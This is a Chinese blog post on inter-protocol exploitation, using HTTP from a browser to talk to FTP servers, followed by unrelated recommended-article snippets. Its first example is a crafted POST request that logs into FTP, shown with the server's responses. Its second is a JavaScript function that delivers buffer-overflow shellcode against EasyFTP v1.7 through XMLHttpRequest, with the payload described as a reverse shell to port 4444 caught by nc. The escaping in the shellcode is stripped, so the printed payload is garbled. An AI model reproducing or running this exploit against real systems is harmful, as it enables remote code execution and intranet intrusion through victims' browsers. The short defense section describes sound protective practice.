linux x25协议通信,跨协议通信技术利用

最新推荐文章于 2023-02-07 23:23:27 发布
最新推荐文章于 2023-02-07 23:23:27 发布
阅读量593 收藏
点赞数
文章标签: linux x25协议通信

# 什么是跨协议通信#

跨协议通信技术(Inter-Protocol Communication)是指两种不同的协议可以交换指令和数据的技术。其中一种称为目标协议,另外一种称为载体协议。目标协议就是我们最终想要通信的协议,而载体协议是用来封装我们最后想要发送的指令和数据。

这种类型的通信想要完成有两个必要条件:

1. 目标协议必须容错性比较好.这是因为我们是通过一个载体协议来传输指令的,这样就很可能会掺杂一些目标协议无法识别的指令。

2. 载体协议能够封装目标协议的指令.即使目标协议无法识别所有封装过的指令,也必须能够识别最终要的部分指令。

# 如何利用跨协议通信 #

跨协议漏洞利用(Inter-Protocol Expoitation)是通过一种协议去攻击运行另外一种协议的服务。

大家最关注的还是载体协议是HTTP的时候,因为这样攻击者就可以通过人人都有浏览器来发起攻击了。这种类型的攻击可以让攻击者访问到本来 只有受害者才有权访问的资源和服务(比如内网不对外开放的服务)。这个过程中受害者充当了一个傀儡的角色,接收并执行了有风险的代码.

一些用换行来作为命令分隔符的协议,比如SMTP,POP3,IRC和FTP都会受这种攻击的影响.这是因为当目标协议处理多行数据的时候是一行一行单独处理的.而这些协议的容错性都比较好.这就使得这些协议忽略掉识别不了的行,只执行可以识别的代码.

为了更好的理解跨协议通信,我们来看一个简单的例子.

# 示例一:通过HTTP连接FTP服务器 #

通过浏览器连接ftp服务器非常简单,一个HTTP POST请求就可以了.下面是一个连接本机的FTP服务器的代码.

假设这个FTP用户密码存在的话,提交这个表单就可以登录到FTP服务器了.是不是很简单.

具体发送的POST请求数据包如下:

POST / HTTP/1.1

Host: 127.0.0.1:21

User-Agent: Mozilla/5.0 (X11; Debian; Linux x86_32; rv:16.0) Gecko/20110007 Firefox/20.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-gb,en;q=0.5

Accept-Encoding: gzip, deflate

Proxy-Connection: keep-alive

Content-Type: multipart/form-data; boundary=---------------------------63079936718166855021600323653

Content-Length: 304

-----------------------------63079936718166855021600323653

Content-Disposition: form-data; name="a"

user secforce

-----------------------------63079936718166855021600323653

Content-Disposition: form-data; name="a"

pass secforce

-----------------------------63079936718166855021600323653--

我们接收到返回数据如下.所有的50X错误对应服务器无法识别的HTTP行.FTP服务器忽略了他们,执行了它可以识别的命令.

220--------- Welcome to Pure-FTPd [privsep] [TLS] ----------

220-Local time is now 12:41. Server port: 21.

220-This is a private system - No anonymous login

220 You will be disconnected after 15 minutes of inactivity.

530 You aren't logged in

500 ?

500 ?

500 ?

500 ?

500 ?

500 ?

500 ?

500 ?

500 ?

500 ?

500 ?

500 ?

331 User secforce OK. Password required

500 ?

500 ?

500 ?

230 OK. Current directory is /

500 ?

自己测试的话你可能发现并不是所有的FTP命令都正常工作.像MKD/RMD和DEL工作正常,GET/PUT,RETR/STOR无法正 常工作.这是因为FTP是一种带外(out-of-band)协议,它的数据和控制指令是通过不同的TCP端口传送的.事实上,如果你尝试用STOR命令 上传一个文件到服务器上,会发现在服务器上创建了一个同名的空文件.这是因为在文件开始传输数据之前先创建一个空文件,所有的命令都不需要一个单独的数据 连接就可以工作。

让我们看一个更加有趣的例子。

# 示例2:通过HTTP溢出FTP服务器反弹shell #

这个例子中我们使用EasyFTP v1.7,这个版本存在一个MKD命令的缓冲区溢出漏洞.需要注意的是这个命令不需要一个额外的数据连 接通道就可以成功执行.我们在虚拟机里搭建好服务器(192.168.1.10),创建”anonymous”用户.因为成功利用这个漏洞的前提是先登录 到FTP服务器.

因为没有必要重复造轮子,这里我们直接使用一个公开的漏洞利用代码(参考资料[1]])来构造POST请求.这次使用javascript 来发送shellcode到FTP服务器.为了成功发送shellcode,我们使用了sendAsBinary函数,详情参考资料[2][3].

最后的函数如下:

function exploit(){

var url = 'http://192.168.1.10:21'

var intro = 'USER anonymousrnPASS anonymousrn'

var payload = 'MKD x89xe7x81xefx10xfexffxffxc7x07x13x57x7exd6x81xc7

x14xffxffxffxffxe7x43x43x43x43x43x43x43x43x43x43

xbaxaex16xd0x74xd9xccxd9x74x24xf4x5ex29xc9xb1x4f

x31x56x14x83xeexfcx03x56x10x4cxe3x2cx9cx19x0cxcd

x5dx79x84x28x6cxabxf2x39xddx7bx70x6fxeexf0xd4x84

x65x74xf1xabxcex32x27x85xcfxf3xe7x49x13x92x9bx93

x40x74xa5x5bx95x75xe2x86x56x27xbbxcdxc5xd7xc8x90

xd5xd6x1ex9fx66xa0x1bx60x12x1ax25xb1x8bx11x6dx29

xa7x7dx4ex48x64x9exb2x03x01x54x40x92xc3xa5xa9xa4

x2bx69x94x08xa6x70xd0xafx59x07x2axccxe4x1fxe9xae

x32xaaxecx09xb0x0cxd5xa8x15xcax9exa7xd2x99xf9xab

xe5x4ex72xd7x6ex71x55x51x34x55x71x39xeexf4x20xe7

x41x09x32x4fx3dxafx38x62x2axc9x62xebx9fxe7x9cxeb

xb7x70xeexd9x18x2ax78x52xd0xf4x7fx95xcbx40xefx68

xf4xb0x39xafxa0xe0x51x06xc9x6bxa2xa7x1cx3bxf2x07

xcfxfbxa2xe7xbfx93xa8xe7xe0x83xd2x2dx97x84x45x62

xb8x1ax92x12xbbx1ax8bxbex32xfcxc1x2execx41x40x00

x3ex23x1fx17x95xa3xbcx8ax72x33xcaxb6x2cx64x9bx09

x25xe0x31x33x9fx16xc8xa5xd8x92x17x16xe6x1bxd5x22

xccx0bx23xaax48x7fxfbxfdx06x29xbdx57xe9x83x17x0b

xa3x43xe1x67x74x15xeexadx02xf9x5fx18x53x06x6fxcc

x53x7fx8dx6cx9bxaax15x8cx7ex7ex60x25x27xebxc9x28

xd8xc6x0ex55x5bxe2xeexa2x43x87xebxefxc3x74x86x60

xa6x7ax35x80xe3'

var req = new XMLHttpRequest();

req.open('POST', url, true);

req.setRequestHeader('Content-Type', 'text/plain');

req.setRequestHeader('Content-Length', '20');

req.sendAsBinary(intro + payload + 'rn'); // neat way to send hexadecimal code through HTTP

}

这里的payload选用了反弹shell到我们自己主机的端口4444.然后用nc监听.当在浏览器中访问嵌入了上面js代码的网页时.奇迹发生了.

# 如何防御攻击 #

1. 屏蔽端口.默认情况下,大部分浏览器会拒绝连接到一些著名的端口,比如21/FTP,25/SMTP等.这种保护方式可以通过修改浏览器配置或者使用非标准端口突破.

2. 更少的容错性.一些协议接受到无法识别的命令的时候会关闭连接.这样子降低了灵活性但是增强了抵御跨协议攻击的能力.更好一点的做法是连续接收到无法识别的命令后关闭连接.

## 结论 ##

正如上面提到的,这种攻击方式有很多限制.通常情况下,想要达到同样的结果有很多比跨协议攻击更好的方式.但是在特定的环境下,这种类型的攻击是一种很有效的攻击方式.

热苏打
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux移植AT91SAM9X25
05-03
html5 postMessage解决iframe协议通信问题
u011927449的博客
08-03 451
a.html有个iframe载入b.com/login.html,当login完成时通知a.html页面登录完成并传递UserName 1.a.html 监听消息 window.addEventListener('message', function (event) { // 通过origin属性判断消息来源地址 //if (event.origin == 'http://127.0.0.1:10847') { console.log(eve
JavaScript域总结与解决办法
weixin_34223655的博客
02-24 126
2019独角兽企业重金招聘Python工程师标准>>> ...
如何实现不同协议之间网络互通
晚风挽着浮云的博客
11-15 4787
OSPF和RIP网络实现互通 1:原理概述: 不同的网络会根据自身的实际情况来选用路由协议。比如有些网络规模很小,为了管理简单,部署了RIP;而有些网络很复杂,可以部署OSPF。不同路由协议之间不能直接共享各自的路由信息,需要依靠配置路由的引入来实现。 获得路由信息一般有三种途径:直连网段、静态路由和路由协议。可以将通过这3中途径获得的路由信息引入到路由信息协议中,例如,把直连网段引入到OSPF中,叫做“引入直连”;把静态路由引入OSPF,叫做“引入静态路由”;把 RIP...
X.25协议
weixin_34345560的博客
06-22 1055
x.25 是第一个面向连接的网络,也是第一个公共数据网络。其数据分组包含3字节头部和128字节数据部分。它运行10年后,20世纪80年代被无错误控制,无流控制,面向连接的新的叫做帧中继的网络所取代。90年代以后,出现了面向连接的ATM网络。 1基本介绍 X.25是一个使用电话或者ISDN设备作为网络硬件设备来架构广域网的ITU-T网络协议。它的物理层,数据链路层和网络层(1-3层)都...
如何测试linux协议
最新发布
yuubeka的博客
02-07 527
工作中需要经常和协议栈打交道,有两种非常简单快速的方法可以对协议栈进行黑盒测试,帮助自己理解协议栈。
通信与网络中的路由器的配置与调试技术
11-18
本文以Cisco2501路由器为例,详细介绍其配置与调试技术。 Cisco2501路由器配备了一个以太网口(AUI)、一个Console控制台口(RJ45)、一个AUX辅助口(RJ45)以及两个同步串口,这些接口支持多种通信标准,如DTE和...
Linux协议栈阅读笔记
06-21
### Linux协议栈阅读笔记知识点详解 #### 一、协议栈概述 ...通过以上知识点的详细解释,我们可以深入了解Linux协议栈的基本概念和技术细节,这对于进一步研究和开发基于Linux的网络应用程序具有重要的指导意义。
数据通信原理与技术
10-13
5.1 通信协议协议分层结构…. 51.1通信协议的一般概念……. 5.1.2通信协议的分层…………. 5.2物理层协议…………………. 5.2.1 基本概念…………………. 5.2.2 CCrR v.N/搬232c建议 ‘ ...
socket通信相关函数
12-16
- `AF_X25`: X.25协议簇。 - **type**: 套接字类型,主要有以下几种: - `SOCK_STREAM`: 字节流套接字,提供可靠的双向有序数据传输服务,例如TCP。 - `SOCK_DGRAM`: 数据报套接字,提供不可靠的无连接服务,例如...
X.25协议详细介绍
05-20
X.25协议详细介绍
【IP 笔记 3.】北邮 互联网协议 Internet Protocol - Data Link Layer
weixin_56193843的博客
12-25 2138
DataLink Layer 问答: Deliver traffic to “neighbouring” routers Switch(交换机是在家里网络的,通常不在Internet之中) 6.1 introduction, services introduction 作用区间: host与router之间,host和router都称为node 相邻的node之间的连接称为links wired links wireless links LANS layer-2 pkt 叫frame,用来包装d
X.25协议概述
07-13 6140
X.25协议是数据终端设备(DTE)和数据电路终端设备(DCE)之间的接口规程其主要功能是描述如何在DTE和DCE之间建立虚电路,传输分组,建立链路,传输数据,拆除链路,拆除虚电路,同时进行差错控制,流量控制,情况统计等. IP包通过X.25网络传送X.25的虚电路统计时分复用SVC(交换虚电路)和PVC(永久虚电路)一个接口最多可以配置4095条虚电路 
hession、burlap和http invoker远程调用方案的使用和比
03-15 895
一、综述 本文比较了RMI,Hessian,Burlap,Httpinvoker,web service等5种通讯协议的在不同的数据结构和不同数据量时的传输性能。 RMI是java语言本身提供的远程通讯协议,稳定高效,是EJB的基础。但它只能用于JAVA程序之间的通讯。 Hessian和Burlap是caucho公司提供的开源协议,基于HTTP传输,服务端不用开防火墙端口。协议的规范公开,可以用于任意语言。 Httpinvoker是SpringFramework提供的远程通讯协议,只能用于J
网段通信过程
智慧云工具箱的博客
05-23 8414
第一章:实验准备 第一节:TOP准备 第二节:IP地址规划表 第二章:正式实验 步骤一:PC1发出ARP的请求包 步骤二:路由器从F0/0发出的ARP回应包 步骤三:PC1发出的ICMP的请求包 步骤四:路由器发出的ARP request包 步骤五:PC2发出的ARP request包 步骤六:PC1成功封装并发出的第二个ICMP请求包 步骤七:路由器从F0/1重新封装并转发请...
iframe通信方案
neoveee的博客
01-19 1039
当在一个页面中,有通过iframe嵌入的新的window时,如果想实现两个window之间的通信,会可能涉及到域的问题,直接访问肯定是被禁止的。使用postMessage就可以安全的绕过这些限制,实现通信。本文通过一个简单的demo,演示下postMessage如何使用,以及其中要注意的几个问题。参数parameters message 需要发出的信息,类型为string 对象或者其他 t
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值